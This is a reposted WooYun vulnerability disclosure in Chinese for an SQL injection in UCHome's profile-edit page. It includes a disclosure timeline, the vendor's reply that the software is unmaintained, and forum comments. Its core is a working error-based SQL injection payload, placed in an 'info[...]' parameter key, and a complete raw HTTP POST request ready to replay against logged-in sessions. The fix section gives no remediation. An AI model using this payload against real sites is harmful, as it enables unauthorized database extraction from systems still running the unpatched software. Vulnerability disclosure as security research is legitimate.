UCHOME SQL注入漏洞

2015年5月3日14:40:43评论527 views字数 205阅读0分41秒阅读模式

摘要

2014-07-21：细节已通知厂商并且等待厂商处理中
2014-07-22：厂商已经确认，细节仅向厂商公开
2014-07-25：细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2014-09-15：细节向核心白帽子及相关领域专家公开
2014-09-25：细节向普通白帽子公开
2014-10-05：细节向实习白帽子公开
2014-10-19：细节向公众公开

漏洞概要关注数(33) 关注此漏洞

缺陷编号： WooYun-2014-69193

漏洞标题： UCHOME SQL注入漏洞

漏洞作者：滨湖虎子

提交时间： 2014-07-21 17:50

公开时间： 2014-10-19 17:52

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： php源码审核

4人收藏

漏洞详情

披露状态：

简要描述：

老牌知名程序，今天研究了一下，发现此漏洞
（需要登录）

详细说明：

注册用户后，修改个人资料。抓包

然后修改如下数据

code 区域

info[0',0,(select (1) from mysql.user where 1%3d1 and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (version())),1,62)))a from information_schema.tables group by a)b)))#]=aaa

=====================

完整HTTP：

code 区域

POST http://**.**.**.**/cp.php?ac=profile&op=info&ref HTTP/1.1
 Accept: text/html, application/xhtml+xml, */*
 Referer: http://**.**.**.**/cp.php
 Accept-Language: zh-CN
 User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
 Content-Type: application/x-www-form-urlencoded
 UA-CPU: AMD64
 Accept-Encoding: gzip, deflate
 Connection: Keep-Alive
 Content-Length: 538
 Host: **.**.**.**
 Pragma: no-cache
 Cookie: uchome_auth=7ef14AJ93VMaXgN%2FG8bk93sG%2FMXWJobCrIUN8W88w7hXFUT0lMkQ8EHzs%2FBOTghCbon2OxclXHfvNtMtYF9l; ECS[visit_times]=1; _nitcFirstTime=2014-7-1%2020%3A38%3A2; _nitcReturnTime=2014-7-1%2020%3A38%3A2; prds0[62]=62; n_prds0=13; n_prd0[62]=13; n_prd20[62]=f37516e49abff12a57c8c6f328acd355; bdshare_firstime=1404980017332; uchome_loginuser=admin; uchome__refer=%252Fadmincp.php; uchome_space_top_show=1; uchome_checkpm=1; uchome_sendmail=1
 
 name=add%27&marry=1&friend%5Bmarry%5D=0&birthyear=1989&birthmonth=2&birthday=1&friend%5Bbirth%5D=0&blood=A&friend%5Bblood%5D=0&birthprovince=%C7%E0%BA%A3&birthcity=%B5%C2%C1%EE%B9%FE&friend%5Bbirthcity%5D=0&resideprovince=%C7%E0%BA%A3&residecity=%B5%C2%C1%EE%B9%FE&friend%5Bresidecity%5D=0&profilesubmit=%B1%A3%B4%E6&formhash=8fc39a43&info[0',0,(select (1) from mysql.user where 1%3d1 and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (version())),1,62)))a from information_schema.tables group by a)b)))#]=aaa

漏洞证明：

修复方案：

你们比我懂

版权声明：转载请注明来源滨湖虎子@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2014-07-22 09:57

厂商回复：

uchome 程序已经停止维护，不过还是要感谢您对我们产品的关注，合作愉快。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-07-21 17:57 | loli ( 普通白帽子 | Rank:649 漏洞数:59 | 每个男人心中都住着一个叫小红的88号技师。)

0

Discuz 要被玩坏了。。。

1# 回复此人
2014-07-21 18:03 | xsser ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)

0

不科学

2# 回复此人
2014-07-21 18:10 | U神 ( 核心白帽子 | Rank:1375 漏洞数:152 | 乌云核心菜鸟，此号处于联盟托管中....)

0

难道洞主是库带社区的一哥？

3# 回复此人
2014-07-21 18:28 | 郭斯特 ( 普通白帽子 | Rank:185 漏洞数:71 | GhostWin)

0

@U神正是

4# 回复此人
2014-07-21 19:04 | 我是小号 ( 普通白帽子 | Rank:366 漏洞数:58 | Martin)

0

裤带一哥！！！

5# 回复此人
2014-07-21 19:17 | pandas ( 普通白帽子 | Rank:730 漏洞数:84 | 国家特级保护动物)

0

是不是还无视GPC，赞下裤袋一哥

6# 回复此人
2014-07-21 19:17 | x7iao ( 普通白帽子 | Rank:395 漏洞数:56 | 文能床上控萝莉，武能床上定人妻)

0

卧槽。

7# 回复此人
2014-07-21 20:58 | 滨湖虎子 ( 实习白帽子 | Rank:68 漏洞数:11 | 阿弥陀佛)

0

编辑之后还要审核？这个漏洞已经通知了360库带计划，由于特殊原因，不好意思，我提重复了现在很想撤稿~

8# 回复此人
2014-07-21 21:17 | saline ( 普通白帽子 | Rank:304 漏洞数:38 | Focus On Web Secur1ty)

0

@滨湖虎子呵呵

9# 回复此人
2014-07-22 09:18 | 冷静 ( 路人 | Rank:3 漏洞数:2 )

0

@滨湖虎子怎么可能让你撤稿赶快注销乌云帐号吧

10# 回复此人

漏洞概要 关注数(33) 关注此漏洞

缺陷编号： WooYun-2014-69193

漏洞标题： UCHOME SQL注入漏洞

相关厂商： Discuz!

漏洞作者： 滨湖虎子

提交时间： 2014-07-21 17:50

公开时间： 2014-10-19 17:52

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 20

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： php源码审核

4人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 滨湖虎子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(33) 关注此漏洞

漏洞作者：滨湖虎子

危害等级：高

漏洞状态：厂商已经确认

版权声明：转载请注明来源滨湖虎子@乌云

漏洞评价(共0人评价):

登陆后才能进行评分